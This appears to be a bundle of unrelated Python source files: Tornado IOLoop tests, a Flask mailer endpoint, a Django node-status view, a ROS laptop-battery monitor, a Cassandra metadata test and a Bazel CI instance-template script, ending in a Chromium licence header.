handle = self.io_loop.call_later(0, lambda: None)
self.assertFalse(handle is None)
self.io_loop.remove_timeout(handle)
def test_close_file_object(self):
"""When a file object is used instead of a numeric file descriptor,
the object should be closed (by IOLoop.close(all_fds=True),
not just the fd.
"""
# Use a socket since they are supported by IOLoop on all platforms.
# Unfortunately, sockets don't support the .closed attribute for
# inspecting their close status, so we must use a wrapper.
class SocketWrapper(object):
def __init__(self, sockobj):
self.sockobj = sockobj
self.closed = False
def fileno(self):
return self.sockobj.fileno()
def close(self):
self.closed = True
self.sockobj.close()
sockobj, port = bind_unused_port()
socket_wrapper = SocketWrapper(sockobj)
io_loop = IOLoop()
io_loop.add_handler(socket_wrapper, lambda fd, events: None, IOLoop.READ)
io_loop.close(all_fds=True)
self.assertTrue(socket_wrapper.closed)
def test_handler_callback_file_object(self):
"""The handler callback receives the same fd object it passed in."""
server_sock, port = bind_unused_port()
fds = []
def handle_connection(fd, events):
fds.append(fd)
conn, addr = server_sock.accept()
conn.close()
self.stop()
self.io_loop.add_handler(server_sock, handle_connection, IOLoop.READ)
with contextlib.closing(socket.socket()) as client_sock:
client_sock.connect(("127.0.0.1", port))
self.wait()
self.io_loop.remove_handler(server_sock)
self.io_loop.add_handler(server_sock.fileno(), handle_connection, IOLoop.READ)
with contextlib.closing(socket.socket()) as client_sock:
client_sock.connect(("127.0.0.1", port))
self.wait()
self.assertIs(fds[0], server_sock)
self.assertEqual(fds[1], server_sock.fileno())
self.io_loop.remove_handler(server_sock.fileno())
server_sock.close()
def test_mixed_fd_fileobj(self):
server_sock, port = bind_unused_port()
def f(fd, events):
pass
self.io_loop.add_handler(server_sock, f, IOLoop.READ)
with self.assertRaises(Exception):
# The exact error is unspecified - some implementations use
# IOError, others use ValueError.
self.io_loop.add_handler(server_sock.fileno(), f, IOLoop.READ)
self.io_loop.remove_handler(server_sock.fileno())
server_sock.close()
def test_reentrant(self):
"""Calling start() twice should raise an error, not deadlock."""
returned_from_start = [False]
got_exception = [False]
def callback():
try:
self.io_loop.start()
returned_from_start[0] = True
except Exception:
got_exception[0] = True
self.stop()
self.io_loop.add_callback(callback)
self.wait()
self.assertTrue(got_exception[0])
self.assertFalse(returned_from_start[0])
def test_exception_logging(self):
"""Uncaught exceptions get logged by the IOLoop."""
self.io_loop.add_callback(lambda: 1 / 0)
self.io_loop.add_callback(self.stop)
with ExpectLog(app_log, "Exception in callback"):
self.wait()
def test_exception_logging_future(self):
"""The IOLoop examines exceptions from Futures and logs them."""
@gen.coroutine
def callback():
self.io_loop.add_callback(self.stop)
1 / 0
self.io_loop.add_callback(callback)
with ExpectLog(app_log, "Exception in callback"):
self.wait()
def test_exception_logging_native_coro(self):
"""The IOLoop examines exceptions from awaitables and logs them."""
async def callback():
# Stop the IOLoop two iterations after raising an exception
# to give the exception time to be logged.
self.io_loop.add_callback(self.io_loop.add_callback, self.stop)
1 / 0
self.io_loop.add_callback(callback)
with ExpectLog(app_log, "Exception in callback"):
self.wait()
def test_spawn_callback(self):
# Both add_callback and spawn_callback run directly on the IOLoop,
# so their errors are logged without stopping the test.
self.io_loop.add_callback(lambda: 1 / 0)
self.io_loop.add_callback(self.stop)
with ExpectLog(app_log, "Exception in callback"):
self.wait()
# A spawned callback is run directly on the IOLoop, so it will be
# logged without stopping the test.
self.io_loop.spawn_callback(lambda: 1 / 0)
self.io_loop.add_callback(self.stop)
with ExpectLog(app_log, "Exception in callback"):
self.wait()
@skipIfNonUnix
def test_remove_handler_from_handler(self):
# Create two sockets with simultaneous read events.
client, server = socket.socketpair()
try:
client.send(b"abc")
server.send(b"abc")
# After reading from one fd, remove the other from the IOLoop.
chunks = []
def handle_read(fd, events):
chunks.append(fd.recv(1024))
if fd is client:
self.io_loop.remove_handler(server)
else:
self.io_loop.remove_handler(client)
self.io_loop.add_handler(client, handle_read, self.io_loop.READ)
self.io_loop.add_handler(server, handle_read, self.io_loop.READ)
self.io_loop.call_later(0.1, self.stop)
self.wait()
# Only one fd was read; the other was cleanly removed.
self.assertEqual(chunks, [b"abc"])
finally:
client.close()
server.close()
@gen_test
def test_init_close_race(self):
# Regression test for #2367
def f():
for i in range(10):
loop = IOLoop()
loop.close()
yield gen.multi([self.io_loop.run_in_executor(None, f) for i in range(2)])
# Deliberately not a subclass of AsyncTestCase so the IOLoop isn't
# automatically set as current.
class TestIOLoopCurrent(unittest.TestCase):
def setUp(self):
self.io_loop = None
IOLoop.clear_current()
def tearDown(self):
if self.io_loop is not None:
self.io_loop.close()
def test_default_current(self):
self.io_loop = IOLoop()
# The first IOLoop with default arguments is made current.
self.assertIs(self.io_loop, IOLoop.current())
# A second IOLoop can be created but is not made current.
io_loop2 = IOLoop()
self.assertIs(self.io_loop, IOLoop.current())
io_loop2.close()
def test_non_current(self):
self.io_loop = IOLoop(make_current=False)
# The new IOLoop is not initially made current.
self.assertIsNone(IOLoop.current(instance=False))
# Starting the IOLoop makes it current, and stopping the loop
# makes it non-current. This process is repeatable.
for i in range(3):
def f():
self.current_io_loop = IOLoop.current()
self.io_loop.stop()
self.io_loop.add_callback(f)
self.io_loop.start()
self.assertIs(self.current_io_loop, self.io_loop)
# Now that the loop is stopped, it is no longer current.
self.assertIsNone(IOLoop.current(instance=False))
def test_force_current(self):
self.io_loop = IOLoop(make_current=True)
self.assertIs(self.io_loop, IOLoop.current())
with self.assertRaises(RuntimeError):
# A second make_current=True construction cannot succeed.
IOLoop(make_current=True)
# current() was not affected by the failed construction.
self.assertIs(self.io_loop, IOLoop.current())
class TestIOLoopCurrentAsync(AsyncTestCase):
@gen_test
def test_clear_without_current(self):
# If there is no current IOLoop, clear_current is a no-op (but
# should not fail). Use a thread so we see the threading.Local
# in a pristine state.
with ThreadPoolExecutor(1) as e:
yield e.submit(IOLoop.clear_current)
class TestIOLoopFutures(AsyncTestCase):
def test_add_future_threads(self):
with futures.ThreadPoolExecutor(1) as pool:
def dummy():
pass
self.io_loop.add_future(
pool.submit(dummy), lambda future: self.stop(future)
)
future = self.wait()
self.assertTrue(future.done())
self.assertTrue(future.result() is None)
@gen_test
def test_run_in_executor_gen(self):
event1 = threading.Event()
event2 = threading.Event()
def sync_func(self_event, other_event):
self_event.set()
other_event.wait()
# Note that return value doesn't actually do anything,
# it is just passed through to our final assertion to
# make sure it is passed through properly.
return self_event
# Run two synchronous functions, which would deadlock if not
# run in parallel.
res = yield [
IOLoop.current().run_in_executor(None, sync_func, event1, event2),
IOLoop.current().run_in_executor(None, sync_func, event2, event1),
]
self.assertEqual([event1, event2], res)
@gen_test
def test_run_in_executor_native(self):
event1 = threading.Event()
event2 = threading.Event()
def sync_func(self_event, other_event):
self_event.set()
other_event.wait()
return self_event
# Go through an async wrapper to ensure that the result of
# run_in_executor works with await and not just gen.coroutine
# (simply passing the underlying concurrrent future would do that).
async def async_wrapper(self_event, other_event):
return await IOLoop.current().run_in_executor(
None, sync_func, self_event, other_event
)
res = yield [async_wrapper(event1, event2), async_wrapper(event2, event1)]
self.assertEqual([event1, event2], res)
@gen_test
def test_set_default_executor(self):
count = [0]
class MyExecutor(futures.ThreadPoolExecutor):
def submit(self, func, *args):
count[0] += 1
return super(MyExecutor, self).submit(func, *args)
event = threading.Event()
def sync_func():
event.set()
executor = MyExecutor(1)
loop = IOLoop.current()
loop.set_default_executor(executor)
yield loop.run_in_executor(None, sync_func)
self.assertEqual(1, count[0])
self.assertTrue(event.is_set())
class TestIOLoopRunSync(unittest.TestCase):
def setUp(self):
self.io_loop = IOLoop()
def tearDown(self):
self.io_loop.close()
def test_sync_result(self):
with self.assertRaises(gen.BadYieldError):
self.io_loop.run_sync(lambda: 42)
def test_sync_exception(self):
with self.assertRaises(ZeroDivisionError):
self.io_loop.run_sync(lambda: 1 / 0)
def test_async_result(self):
@gen.coroutine
def f():
yield gen.moment
raise gen.Return(42)
self.assertEqual(self.io_loop.run_sync(f), 42)
def test_async_exception(self):
@gen.coroutine
def f():
yield gen.moment
1 / 0
with self.assertRaises(ZeroDivisionError):
self.io_loop.run_sync(f)
def test_current(self):
def f():
self.assertIs(IOLoop.current(), self.io_loop)
self.io_loop.run_sync(f)
def test_timeout(self):
@gen.coroutine
def f():
yield gen.sleep(1)
self.assertRaises(TimeoutError, self.io_loop.run_sync, f, timeout=0.01)
def test_native_coroutine(self):
@gen.coroutine
def f1():
yield gen.moment
async def f2():
await f1()
self.io_loop.run_sync(f2)
class TestPeriodicCallbackMath(unittest.TestCase):
def simulate_calls(self, pc, durations):
"""Simulate a series of calls to the PeriodicCallback.
Pass a list of call durations in seconds (negative values
work to simulate clock adjustments during the call, or more or
less equivalently, between calls). This method returns the
times at which each call would be made.
"""
calls = []
now = 1000
pc._next_timeout = now
for d in durations:
pc._update_next(now)
calls.append(pc._next_timeout)
now = pc._next_timeout + d
return calls
def dummy(self):
pass
def test_basic(self):
pc = PeriodicCallback(self.dummy, 10000)
self.assertEqual(
self.simulate_calls(pc, [0] * 5), [1010, 1020, 1030, 1040, 1050]
)
def test_overrun(self):
# If a call runs for too long, we skip entire cycles to get
# back on schedule.
call_durations = [9, 9, 10, 11, 20, 20, 35, 35, 0, 0, 0]
expected = [
1010,
1020,
1030, # first 3 calls on schedule
1050,
1070, # next 2 delayed one cycle
1100,
1130, # next 2 delayed 2 cycles
1170,
1210, # next 2 delayed 3 cycles
1220,
1230, # then back on schedule.
]
pc = PeriodicCallback(self.dummy, 10000)
self.assertEqual(self.simulate_calls(pc, call_durations), expected)
def test_clock_backwards(self):
pc = PeriodicCallback(self.dummy, 10000)
# Backwards jumps are ignored, potentially resulting in a
# slightly slow schedule (although we assume that when
# time.time() and time.monotonic() are different, time.time()
# is getting adjusted by NTP and is therefore more accurate)
self.assertEqual(
self.simulate_calls(pc, [-2, -1, -3, -2, 0]), [1010, 1020, 1030, 1040, 1050]
)
# For big jumps, we should perhaps alter the schedule, but we
# don't currently. This trace shows that we run callbacks
# every 10s of time.time(), but the first and second calls are
# 110s of real time apart because the backwards jump is
# ignored.
self.assertEqual(self.simulate_calls(pc, [-100, 0, 0]), [1010, 1020, 1030])
def test_jitter(self):
random_times = [0.5, 1, 0, 0.75]
expected = [1010, 1022.5, 1030, 1041.25]
call_durations = [0] * len(random_times)
pc = PeriodicCallback(self.dummy, 10000, jitter=0.5)
def mock_random():
return random_times.pop(0)
with mock.patch("random.random", mock_random):
self.assertEqual(self.simulate_calls(pc, call_durations), expected)
class TestIOLoopConfiguration(unittest.TestCase):
def run_python(self, *statements):
stmt_list = [
"from tornado.ioloop import IOLoop",
"classname = lambda x: x.__class__.__name__",
] + list(statements)
args = [sys.executable, "-c", "; ".join(stmt_list)]
return native_str(subprocess.check_output(args)).strip()
def test_default(self):
# When asyncio is available, it is used by default.
cls = self.run_python("print(classname(IOLoop.current()))")
self.assertEqual(cls, "AsyncIOMainLoop")
cls = self.run_python("print(classname(IOLoop()))")
self.assertEqual(cls, "AsyncIOLoop")
def test_asyncio(self):
cls = self.run_python(
'IOLoop.configure("tornado.platform.asyncio.AsyncIOLoop")',
"print(classname(IOLoop.current()))",
)
self.assertEqual(cls, "AsyncIOMainLoop")
def test_asyncio_main(self):
cls = self.run_python(
"from tornado.platform.asyncio import AsyncIOMainLoop",
"AsyncIOMainLoop().install()",
"print(classname(IOLoop.current()))",
)
self.assertEqual(cls, "AsyncIOMainLoop")
if __name__ == "__main__":
unittest.main()
|
index.py
|
"""
# coding=utf-8
"""
import os.path
import logging.handlers
from datetime import datetime
from threading import Thread
from flask import Flask, abort, request, jsonify
from flask_mail import Mail, Message
from dotenv import load_dotenv
load_dotenv()
app = Flask(__name__)
KEY_MESSAGE = 'message'
KEY_DATETIME = 'datetime'
KEY_LOCATION = 'location'
KEY_LOCATION_UNKNOWN = 'unknown'
KEY_LOCATION_LATITUDE = 'latitude'
KEY_LOCATION_LONGITUDE = 'longitude'
KEY_LOCATION_ADDRESS = 'address'
SMTP_LOGIN = os.getenv('SMTP_LOGIN', 'user@example.com')
SMTP_FROM = os.getenv('SMTP_FROM', 'User First Name - Last Name')
SMTP_PASSWORD = os.getenv('SMTP_PASSWORD', 'very_secret')
MAIL_SUBJECT = os.getenv('SMTP_MAIL_SUBJECT', 'Mail Subject')
SMTP_SERVER = os.getenv('SMTP_SERVER', 'smtp.example.com')
SMTP_PORT = int(os.getenv('SMTP_PORT', 587))
SMTP_SECURE = os.getenv('SMTP_SECURE', '')
app.config.update(
MAIL_SERVER=SMTP_SERVER,
MAIL_PORT=SMTP_PORT,
MAIL_USE_SSL=SMTP_SECURE == 'ssl',
MAIL_USE_TLS=SMTP_SECURE == 'tls',
MAIL_USERNAME=SMTP_LOGIN,
MAIL_PASSWORD=SMTP_PASSWORD
)
mail = Mail(app)
logs_dir = os.path.join(app.root_path, 'logs')
# create logs dir if needed
if not os.path.isdir(logs_dir):
os.mkdir(logs_dir)
LOG_FILENAME = os.path.join(logs_dir, 'mailer.log')
logger = logging.getLogger("Mailer Logs")
logger.setLevel(logging.INFO)
handler = logging.handlers.RotatingFileHandler(LOG_FILENAME, maxBytes=5000000, backupCount=5)
logger.addHandler(handler)
# decorator
def a_sync(f: callable) -> callable:
"""
:param f: the function to run
:return: the wrapper of the the new thread
"""
def wrapper(*args, **kwargs):
"""
:param args: The function args
:param kwargs: The function kwargs
"""
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
@app.route('/', methods=['GET', 'POST'])
def root():
"""
The one endpoint
:return: http response
"""
if not request.json:
return abort(400)
else:
json_data = request.json
mailto = request.args.get('mailto', None)
log_data = json_data.copy()
log_data['log_datetime'] = str(datetime.now())
logger.info(log_data)
# Send mail
if 'mailto' in json_data:
mailto = json_data['mailto']
if mailto is not None:
send_email(json_data, mailto)
return jsonify(success=True)
@a_sync
def send_async_email(msg):
"""Background task to send an email with Flask-Mail.
:param Message msg: object containing the subject, the array of recipients, the body and the sender of the mail
"""
with app.app_context():
mail.send(msg)
def get_location_string(location_dict):
"""
:param location_dict:
:return:
"""
if KEY_LOCATION_ADDRESS in location_dict and \
str(location_dict[KEY_LOCATION_ADDRESS]).lower() != KEY_LOCATION_UNKNOWN:
return str(location_dict[KEY_LOCATION_ADDRESS])
if KEY_LOCATION_LATITUDE in location_dict and KEY_LOCATION_LONGITUDE in location_dict \
and float(location_dict[KEY_LOCATION_LATITUDE]) != 0 and float(location_dict[KEY_LOCATION_LONGITUDE]) != 0:
return KEY_LOCATION_LATITUDE + ': ' + \
str(location_dict[KEY_LOCATION_LATITUDE]) + \
KEY_LOCATION_LONGITUDE + ':' + \
str(location_dict[KEY_LOCATION_LONGITUDE])
return None
def get_mail_body(posted_data):
"""
:param Dict posted_data:
:return String mail_body: the string in readable format to be used as mail body
"""
json_data = posted_data
# Backwards compatibility
if 'data' in posted_data:
json_data = posted_data['data']
mail_body = 'Details: \nDatetime: '
if KEY_DATETIME in json_data:
mail_body += str(json_data[KEY_DATETIME])
else:
mail_body += str(datetime.now())
mail_body += ',\nLocation: '
if KEY_LOCATION in json_data:
location_string = get_location_string(json_data[KEY_LOCATION])
mail_body += location_string if location_string is not None and len(location_string) > 1 else 'Unknown'
else:
mail_body += 'Unknown'
mail_body += '\nMessage: '
if KEY_MESSAGE in json_data:
mail_body += '"' + json_data[KEY_MESSAGE] + '"'
return mail_body
def send_email(json_data, to):
"""Prepares a mail Message to be sent as a background task with Flask-Mail
:param to: list[str] the list of recipients
:param dict json_data: The dictionary that has info for the mail
"""
if not isinstance(to, list):
to = [to]
msg = Message(subject=MAIL_SUBJECT,
recipients=to,
body=get_mail_body(json_data),
sender=SMTP_LOGIN + '<' + SMTP_FROM + '>')
send_async_email(msg)
if __name__ == '__main__':
app.run(host='0.0.0.0')
|
views.py
|
import requests
from threading import Thread
from django.contrib.auth.decorators import login_required
from django.shortcuts import render
from node.models import Node
@login_required
def home(request):
nodes = Node.objects.all()
def thread_func(node):
try:
# For production add the timeout argument to ensure that the
# request below won't stay hanging for a response.
# e.g. requests.get(<address>, timeout=<time_in_seconds>)
response = requests.get(f'http://{node.IP}:{node.PORT}/api/get_id')
node.status = 'Online'
except BaseException:
node.status = 'Offline'
node.save()
# We use threads to optimize our TTFB (time to first byte).
threads = []
for node in nodes:
thread = Thread(target=thread_func, args=(node,))
threads.append(thread)
thread.start()
for tr in threads:
tr.join()
# We initialize our database by adding 10 default nodes. Therefore their
# id will be less than 11 [0,...,10]
return render(request, 'noobcash/homepage.html', {
'nodes': Node.objects.filter(id__lt=11)
}
)
|
laptop_battery.py
|
#!/usr/bin/env python
# Software License Agreement (BSD License)
#
# Copyright (c) 2011, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of the Willow Garage nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
##\author Kevin Watts
##\brief Monitors laptop battery status
from __future__ import division
import roslib
from collections import deque
import threading
import copy
import yaml
import math
import rospy
import os # to check path existence
from linux_hardware.msg import LaptopChargeStatus
from diagnostic_msgs.msg import DiagnosticStatus, DiagnosticArray, KeyValue
def _strip_Ah(raw_val):
if 'mAh' in raw_val:
rv = float(raw_val.rstrip('mAh').strip()) / 1000.0
elif 'Ah' in raw_val:
rv = float(raw_val.rstrip('Ah').strip())
elif 'mWh' in raw_val:
rv = float(raw_val.rstrip('mWh').strip()) / 1000.0
elif 'Wh' in raw_val:
rv = float(raw_val.rstrip('Wh').strip())
else:
raise Exception('Value %s did not have supported units. (mAh,Ah,mWh,Wh)' % raw_val)
return rv
def _strip_V(raw_val):
if 'mV' in raw_val:
rv = float(raw_val.rstrip('mV').strip()) / 1000.0
elif 'V' in raw_val:
rv = float(raw_val.rstrip('V').strip())
else:
raise Exception('Value %s did not have "V" or "mV"' % raw_val)
return rv
def _strip_A(raw_val):
if 'mA' in raw_val:
rv = float(raw_val.rstrip('mA').strip()) / 1000.0
elif 'A' in raw_val:
rv = float(raw_val.rstrip('A').strip())
elif 'mW' in raw_val:
rv = float(raw_val.rstrip('mW').strip()) / 1000.0
elif 'W' in raw_val:
rv = float(raw_val.rstrip('W').strip())
else:
raise Exception('Value %s did not have supported units. (mAh,Ah,mWh,Wh)' % raw_val)
return rv
def slerp(filename):
f = open(filename, 'r')
data = f.read()
f.close()
data = data.replace('\t', ' ')
return data
def _read_string(filename, default=""):
if not os.access(filename, os.F_OK):
return default
f = open(filename, 'r')
data = f.read()
f.close()
return data
def _read_number(filename, default=0):
try:
data = int(_read_string(filename))
return data
except exceptions.ValueError:
return default
def _check_battery_info(_battery_acpi_path):
if _battery_acpi_path.startswith('/proc'):
if os.access(_battery_acpi_path, os.F_OK):
o = slerp(_battery_acpi_path+'/info')
else:
raise Exception(_battery_acpi_path+' does not exist')
batt_info = yaml.load(o)
design_capacity = _strip_Ah(batt_info.get('design capacity', '0 mAh'))
last_full_capacity = _strip_Ah(batt_info.get('last full capacity', '0 mAh'))
else:
design_capacity = _read_number(_battery_acpi_path + '/energy_full')
last_full_capacity = _read_number(_battery_acpi_path + '/energy_full_design')
return (design_capacity, last_full_capacity)
state_to_val = {'charged': LaptopChargeStatus.CHARGED,
'full': LaptopChargeStatus.CHARGED,
'charging': LaptopChargeStatus.CHARGING,
'discharging': LaptopChargeStatus.DISCHARGING,
'unknown': LaptopChargeStatus.CHARGING, }
diag_level_to_msg = { DiagnosticStatus.OK: 'OK',
DiagnosticStatus.WARN: 'Warning',
DiagnosticStatus.ERROR: 'Error' }
def _check_battery_state(_battery_acpi_path):
"""
@return LaptopChargeStatus
"""
rv = LaptopChargeStatus()
if _battery_acpi_path.startswith('/proc'):
if os.access(_battery_acpi_path, os.F_OK):
o = slerp(_battery_acpi_path+'/state')
else:
raise Exception(_battery_acpi_path+' does not exist')
batt_info = yaml.load(o)
state = batt_info.get('charging state', 'discharging')
rv.charge_state = state_to_val.get(state, 0)
rv.rate = _strip_A(batt_info.get('present rate', '-1 mA'))
if rv.charge_state == LaptopChargeStatus.DISCHARGING:
rv.rate = math.copysign(rv.rate, -1) # Need to set discharging rate to negative
rv.charge = _strip_Ah(batt_info.get('remaining capacity', '-1 mAh')) # /energy_now
rv.voltage = _strip_V(batt_info.get('present voltage', '-1 mV')) # /voltage_now
rv.present = batt_info.get('present', False) # /present
rv.header.stamp = rospy.get_rostime()
else:
state = _read_string(_battery_acpi_path+'/status', 'discharging').lower()
rv.charge_state = state_to_val.get(state, 0)
rv.rate = _read_number(_battery_acpi_path + '/power_now')
if rv.charge_state == LaptopChargeStatus.DISCHARGING:
rv.rate = math.copysign(rv.rate, -1) # Need to set discharging rate to negative
rv.charge = _read_number(_battery_acpi_path + '/energy_now')
rv.voltage = _read_number(_battery_acpi_path + '/voltage_now')
rv.present = _read_number(_battery_acpi_path + '/present') == 1
rv.header.stamp = rospy.get_rostime()
return rv
def _laptop_charge_to_diag(laptop_msg):
rv = DiagnosticStatus()
rv.level = DiagnosticStatus.OK
rv.message = 'OK'
rv.name = 'Laptop Battery'
if not laptop_msg.present:
rv.level = DiagnosticStatus.ERROR
rv.message = 'Laptop battery missing'
rv.values.append(KeyValue('Voltage (V)', str(laptop_msg.voltage)))
rv.values.append(KeyValue('Current (A)', str(laptop_msg.rate)))
rv.values.append(KeyValue('Charge (Ah)', str(laptop_msg.charge)))
rv.values.append(KeyValue('Capacity (Ah)', str(laptop_msg.capacity)))
rv.values.append(KeyValue('Design Capacity (Ah)', str(laptop_msg.design_capacity)))
return rv
class LaptopBatteryMonitor(object):
def __init__(self):
self._mutex = threading.Lock()
self._last_info_update = 0
self._last_state_update = 0
self._msg = LaptopChargeStatus()
self._power_pub = rospy.Publisher('laptop_charge', LaptopChargeStatus, latch=True)
self._diag_pub = rospy.Publisher('/diagnostics', DiagnosticArray)
# Battery info
self._batt_acpi_path = rospy.get_param('~acpi_path', "/proc/acpi/battery/BAT1")
self._batt_design_capacity = 0
self._batt_last_full_capacity = 0
self._last_info_update = 0
self._batt_info_rate = 1 / 60.0
self._batt_info_thread = threading.Thread(target=self._check_batt_info)
self._batt_info_thread.daemon = True
self._batt_info_thread.start()
# Battery state
self._batt_state_rate = 1 / 5.0
self._batt_state_thread = threading.Thread(target=self._check_batt_state)
self._batt_state_thread.daemon = True
self._batt_state_thread.start()
def _check_batt_info(self):
rate = rospy.Rate(self._batt_info_rate)
while not rospy.is_shutdown():
try:
design_cap, last_full_cap = _check_battery_info(self._batt_acpi_path)
with self._mutex:
self._batt_last_full_capacity = last_full_cap
self._batt_design_capacity = design_cap
self._last_info_update = rospy.get_time()
except Exception, e:
rospy.logwarn('Battery : unable to check laptop battery info [%s]' % e)
rospy.signal_shutdown('Battery : unable to check laptop battery info [%s]' % e)
rate.sleep()
def _check_batt_state(self):
rate = rospy.Rate(self._batt_state_rate)
while not rospy.is_shutdown():
try:
msg = _check_battery_state(self._batt_acpi_path)
with self._mutex:
self._msg = msg
self._last_state_update = rospy.get_time()
except Exception, e:
rospy.logwarn('Battery : unable to check laptop battery state [%s]' % e)
rospy.signal_shutdown('Battery : unable to check laptop battery state [%s]' % e)
rate.sleep()
def update(self):
with self._mutex:
diag = DiagnosticArray()
diag.header.stamp = rospy.get_rostime()
info_update_ok = rospy.get_time() - self._last_info_update < 5.0 / self._batt_info_rate
state_update_ok = rospy.get_time() - self._last_state_update < 5.0 / self._batt_state_rate
if info_update_ok:
self._msg.design_capacity = self._batt_design_capacity
self._msg.capacity = self._batt_last_full_capacity
else:
self._msg.design_capacity = 0.0
self._msg.capacity = 0.0
if info_update_ok and state_update_ok and self._msg.capacity != 0:
self._msg.percentage = int(self._msg.charge / self._msg.capacity * 100.0)
diag_stat = _laptop_charge_to_diag(self._msg)
if not info_update_ok or not state_update_ok:
diag_stat.level = DiagnosticStatus.ERROR
diag_stat.message = 'Laptop battery data stale'
diag.status.append(diag_stat)
self._diag_pub.publish(diag)
self._power_pub.publish(self._msg)
if __name__ == '__main__':
rospy.init_node('laptop_battery')
bm = LaptopBatteryMonitor()
try:
r = rospy.Rate(1.0)
while not rospy.is_shutdown():
bm.update()
r.sleep()
except KeyboardInterrupt:
pass
except Exception:
import traceback
traceback.print_exc()
|
metadata_test.py
|
import threading
import time
import logging
import pytest
from dtest import Tester
logger = logging.getLogger(__name__)
class TestMetadata(Tester):
def force_compact(self):
cluster = self.cluster
(node1, node2) = cluster.nodelist()
node1.nodetool("compact keyspace1 standard1")
def force_repair(self):
cluster = self.cluster
(node1, node2) = cluster.nodelist()
node1.nodetool('repair keyspace1 standard1')
def do_read(self):
cluster = self.cluster
(node1, node2) = cluster.nodelist()
node1.stress(['read', 'no-warmup', 'n=30000', '-schema', 'replication(factor=2)', 'compression=LZ4Compressor',
'-rate', 'threads=1'])
@pytest.mark.skip(reason='hangs CI')
def test_metadata_reset_while_compact(self):
"""
Resets the schema while a compact, read and repair happens.
All kinds of glorious things can fail.
"""
# while the schema is being reset, there will inevitably be some
# queries that will error with this message
self.fixture_dtest_setup.ignore_log_patterns = ['.*Unknown keyspace/cf pair.*']
cluster = self.cluster
cluster.populate(2).start()
(node1, node2) = cluster.nodelist()
node1.nodetool("disableautocompaction")
node1.nodetool("setcompactionthroughput 1")
for i in range(3):
node1.stress(['write', 'no-warmup', 'n=30000', '-schema', 'replication(factor=2)',
'compression=LZ4Compressor', '-rate', 'threads=5', '-pop', 'seq=1..30000'])
node1.flush()
thread = threading.Thread(target=self.force_compact)
thread.start()
time.sleep(1)
thread2 = threading.Thread(target=self.force_repair)
thread2.start()
time.sleep(5)
thread3 = threading.Thread(target=self.do_read)
thread3.start()
time.sleep(5)
node1.nodetool("resetlocalschema")
thread.join()
thread2.join()
thread3.join()
|
create_instance_template.py
|
#!/usr/bin/env python3
#
# Copyright 2018 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
from datetime import datetime
import os
import queue
import sys
import threading
import yaml
import gcloud
WORK_QUEUE = queue.Queue()
def worker():
while True:
item = WORK_QUEUE.get()
if not item:
break
try:
# We take a few keys out of the config item. The rest is passed
# as-is to create_instance_template() and thus to the gcloud
# command line tool.
del item["count"]
instance_group_name = item.pop("name")
project = item.pop("project")
zone = item.pop("zone", None)
region = item.pop("region", None)
del item["health_check"]
del item["initial_delay"]
if not project:
raise Exception("Invalid instance config, no project name set")
if not zone and not region:
raise Exception("Invalid instance config, either zone or region must be specified")
timestamp = datetime.now().strftime("%Y%m%dt%H%M%S")
template_name = "{}-{}".format(instance_group_name, timestamp)
# Create the new instance template.
gcloud.create_instance_template(template_name, project=project, **item)
print("Created instance template {}".format(template_name))
finally:
WORK_QUEUE.task_done()
def read_config_file():
path = os.path.join(os.getcwd(), "instances.yml")
with open(path, "rb") as fd:
content = fd.read().decode("utf-8")
return yaml.safe_load(content)
def main(argv=None):
if argv is None:
argv = sys.argv[1:]
parser = argparse.ArgumentParser(description="Bazel CI Instance Creation")
parser.add_argument(
"names",
type=str,
nargs="*",
help="List of instance (group) names that should be created. "
'These values must correspond to "name" entries in the '
'Yaml configuration, e.g. "bk-docker".',
)
args = parser.parse_args(argv)
config = read_config_file()
# Verify names passed on the command-line.
valid_names = [item["name"] for item in config["instance_groups"]]
for name in args.names:
if name not in valid_names:
print("Unknown instance name: {}!".format(name))
print("\nValid instance names are: {}".format(" ".join(valid_names)))
return 1
if not args.names:
parser.print_help()
print("\nValid instance names are: {}".format(" ".join(valid_names)))
return 1
# Put VM creation instructions into the work queue.
for instance in config["instance_groups"]:
if instance["name"] not in args.names:
continue
WORK_QUEUE.put({**config["default_vm"], **instance})
# Spawn worker threads that will create the VMs.
threads = []
for _ in range(WORK_QUEUE.qsize()):
t = threading.Thread(target=worker)
t.start()
threads.append(t)
# Wait for all VMs to be created.
WORK_QUEUE.join()
# Signal worker threads to exit.
for _ in range(len(threads)):
WORK_QUEUE.put(None)
# Wait for worker threads to exit.
for t in threads:
t.join()
return 0
if __name__ == "__main__":
sys.exit(main())
|
chrome_test_server_spawner.py
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
